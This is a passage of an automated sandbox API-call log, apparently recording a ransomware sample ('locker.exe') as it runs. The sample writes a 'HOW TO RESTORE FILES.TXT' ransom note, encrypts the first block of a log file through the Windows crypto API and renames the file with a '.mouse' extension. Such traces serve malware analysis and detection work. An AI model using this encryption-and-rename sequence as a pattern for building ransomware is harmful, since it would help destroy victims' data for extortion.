lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Logs", lpUsedDefaultChar=0x0) returned 4 [0197.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0197.663] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc38 [0197.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x43cc38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 19 [0197.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0197.663] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbe8 [0197.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x43cbe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 19 [0197.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0197.664] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb48 [0197.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x43cb48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 19 [0197.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0197.664] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc10 [0197.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x43cc10, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 19 [0197.664] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc10 | out: hHeap=0x3c0000) returned 1 [0197.664] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb48 | out: hHeap=0x3c0000) returned 1 [0197.664] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbe8 | out: hHeap=0x3c0000) returned 1 [0197.664] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc38 | out: hHeap=0x3c0000) returned 1 [0197.664] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b8e0 | out: hHeap=0x3c0000) returned 1 [0197.664] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d38 [0197.664] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419df8 | out: hHeap=0x3c0000) returned 1 [0197.664] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", fInfoLevelId=0x1, lpFindFileData=0x12af88c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x12af88c) returned 0x432d78 [0197.690] FindNextFileW (in: hFindFile=0x432d78, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x214, dwReserved1=0x220, cFileName="..", cAlternateFileName="")) returned 1 [0197.691] FindNextFileW (in: hFindFile=0x432d78, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x214, dwReserved1=0x220, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="")) returned 1 [0197.691] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435890 [0197.691] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40b438 [0197.692] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b218 | out: hHeap=0x3c0000) returned 1 [0197.692] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435890 | out: hHeap=0x3c0000) returned 1 [0197.692] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40aa20 [0197.692] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435890 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="downlevel_2017_09_07_02_02_39_766.log", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0197.692] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b218 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="downlevel_2017_09_07_02_02_39_766.log", cchWideChar=37, lpMultiByteStr=0x42b218, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 37 [0197.692] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435890 | out: hHeap=0x3c0000) returned 1 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0197.692] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=57, lpMultiByteStr=0x437288, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 57 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0197.692] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x4372d0 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=57, lpMultiByteStr=0x4372d0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 57 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0197.692] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=57, lpMultiByteStr=0x436ca0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 57 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0197.692] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436dc0 [0197.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=57, lpMultiByteStr=0x436dc0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 57 [0197.692] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436dc0 | out: hHeap=0x3c0000) returned 1 [0197.692] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0197.692] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4372d0 | out: hHeap=0x3c0000) returned 1 [0197.693] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.693] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.693] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bc98 [0197.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".log", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0197.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".log", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".log", lpUsedDefaultChar=0x0) returned 4 [0197.693] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0197.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0197.693] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccb0 [0197.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x43ccb0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 19 [0197.693] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0197.693] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb70 [0197.693] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bcd0 [0197.693] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb70 | out: hHeap=0x3c0000) returned 1 [0197.693] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be90 [0197.693] AreFileApisANSI () returned 1 [0197.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42be90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0197.693] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5a) returned 0x3ec6e8 [0197.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42be90, cbMultiByte=-1, lpWideCharStr=0x3ec6e8, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\HOW TO RESTORE FILES.TXT") returned 45 [0197.693] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\logs\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x42be90, ftLastAccessTime.dwLowDateTime=0x12afa94, ftLastAccessTime.dwHighDateTime=0x363223, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x41f208, nFileSizeHigh=0x70, nFileSizeLow=0x370bb4)) returned 0 [0197.693] GetLastError () returned 0x2 [0197.693] GetLastError () returned 0x2 [0197.694] SetLastError (dwErrCode=0x2) [0197.694] GetLastError () returned 0x2 [0197.694] SetLastError (dwErrCode=0x2) [0197.694] GetLastError () returned 0x2 [0197.694] SetLastError (dwErrCode=0x2) [0197.694] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0197.694] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be90 | out: hHeap=0x3c0000) returned 1 [0197.694] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c88 [0197.694] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419ca8 [0197.694] AreFileApisANSI () returned 1 [0197.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bcd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0197.694] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5a) returned 0x3ecc30 [0197.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bcd0, cbMultiByte=-1, lpWideCharStr=0x3ecc30, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\HOW TO RESTORE FILES.TXT") returned 45 [0197.694] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\logs\\how to restore files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x12af930, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0197.746] GetFileType (hFile=0x5b0) returned 0x1 [0197.746] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ecc30 | out: hHeap=0x3c0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.746] GetLastError () returned 0x0 [0197.746] SetLastError (dwErrCode=0x0) [0197.746] WriteFile (in: hFile=0x5b0, lpBuffer=0x12ae5c0*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x12ae5b8, lpOverlapped=0x0 | out: lpBuffer=0x12ae5c0*, lpNumberOfBytesWritten=0x12ae5b8*=0x71, lpOverlapped=0x0) returned 1 [0197.748] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.748] CloseHandle (hObject=0x5b0) returned 1 [0197.754] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419ca8 | out: hHeap=0x3c0000) returned 1 [0197.754] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c88 | out: hHeap=0x3c0000) returned 1 [0197.754] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2)) returned 1 [0197.755] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40a668 [0197.755] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0197.755] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6b2 [0197.755] CloseHandle (hObject=0x5b0) returned 1 [0197.756] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40a668 | out: hHeap=0x3c0000) returned 1 [0197.756] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40a668 [0197.756] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40a668 | out: hHeap=0x3c0000) returned 1 [0197.756] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40a668 [0197.756] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40a668 | out: hHeap=0x3c0000) returned 1 [0197.756] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0197.756] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43dc98 [0197.756] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43dc98, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0197.756] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43dc98 | out: hHeap=0x3c0000) returned 1 [0197.756] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40a668 [0197.756] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0197.756] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6b2 [0197.756] CloseHandle (hObject=0x5b0) returned 1 [0197.756] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40a668 | out: hHeap=0x3c0000) returned 1 [0197.756] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d68 [0197.757] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419cd8 [0197.757] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0197.757] GetFileType (hFile=0x5b0) returned 0x1 [0197.757] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa6d2) returned 0x445608 [0197.757] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa6d2) returned 0x44fce8 [0197.759] ReadFile (in: hFile=0x5b0, lpBuffer=0x445608, nNumberOfBytesToRead=0xa000, lpNumberOfBytesRead=0x12af770, lpOverlapped=0x0 | out: lpBuffer=0x445608*, lpNumberOfBytesRead=0x12af770*=0xa000, lpOverlapped=0x0) returned 1 [0197.769] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.770] ReadFile (in: hFile=0x5b0, lpBuffer=0x3f6f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesRead=0x12af714*=0x6b2, lpOverlapped=0x0) returned 1 [0197.770] SetFilePointerEx (in: hFile=0x5b0, liDistanceToMove=0xa6b2, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0197.771] GetVersion () returned 0x23f00206 [0197.771] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40a668) returned 1 [0197.776] CryptImportKey (in: hProv=0x40a668, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x432bf8) returned 1 [0197.776] CryptSetKeyParam (hKey=0x432bf8, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0197.776] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1020) returned 0x43e570 [0197.776] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43e570*, pdwDataLen=0x12af88c*=0x1000, dwBufLen=0x1020 | out: pbData=0x43e570*, pdwDataLen=0x12af88c*=0x1010) returned 1 [0197.776] CryptDestroyKey (hKey=0x432bf8) returned 1 [0197.777] CryptReleaseContext (hProv=0x40a668, dwFlags=0x0) returned 1 [0197.777] SetFilePointerEx (in: hFile=0x5b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0197.777] GetLastError () returned 0x0 [0197.777] SetLastError (dwErrCode=0x0) [0197.777] WriteFile (in: hFile=0x5b0, lpBuffer=0x43e570*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x12af704, lpOverlapped=0x0 | out: lpBuffer=0x43e570*, lpNumberOfBytesWritten=0x12af704*=0x1000, lpOverlapped=0x0) returned 1 [0197.777] GetLastError () returned 0x0 [0197.777] SetLastError (dwErrCode=0x0) [0197.778] WriteFile (in: hFile=0x5b0, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x12af6f0, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af6f0*=0x1000, lpOverlapped=0x0) returned 1 [0197.778] WriteFile (in: hFile=0x5b0, lpBuffer=0x4475f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x12af704, lpOverlapped=0x0 | out: lpBuffer=0x4475f8*, lpNumberOfBytesWritten=0x12af704*=0x8000, lpOverlapped=0x0) returned 1 [0197.778] GetLastError () returned 0x0 [0197.778] SetLastError (dwErrCode=0x0) [0197.779] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43e570 | out: hHeap=0x3c0000) returned 1 [0197.779] WriteFile (in: hFile=0x5b0, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x6c2, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af7c8*=0x6c2, lpOverlapped=0x0) returned 1 [0197.779] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.779] CloseHandle (hObject=0x5b0) returned 1 [0197.782] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x445608 | out: hHeap=0x3c0000) returned 1 [0197.784] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x44fce8 | out: hHeap=0x3c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40a668 [0197.786] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0197.786] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43dc98 [0197.786] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43dc98, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0197.786] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43dc98 | out: hHeap=0x3c0000) returned 1 [0197.786] MoveFileExW (lpExistingFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), lpNewFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.mouse" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.mouse"), dwFlags=0x2) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x444b70 [0197.787] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.mouse" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x5b0 [0197.787] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0197.788] GetProcAddress (hModule=0x74bc0000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x74c8b830 [0197.788] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0197.788] SetFileTime (hFile=0x5b0, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0197.788] CloseHandle (hObject=0x5b0) returned 1 [0197.789] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x444b70 | out: hHeap=0x3c0000) returned 1 [0197.789] HeapFree (in: 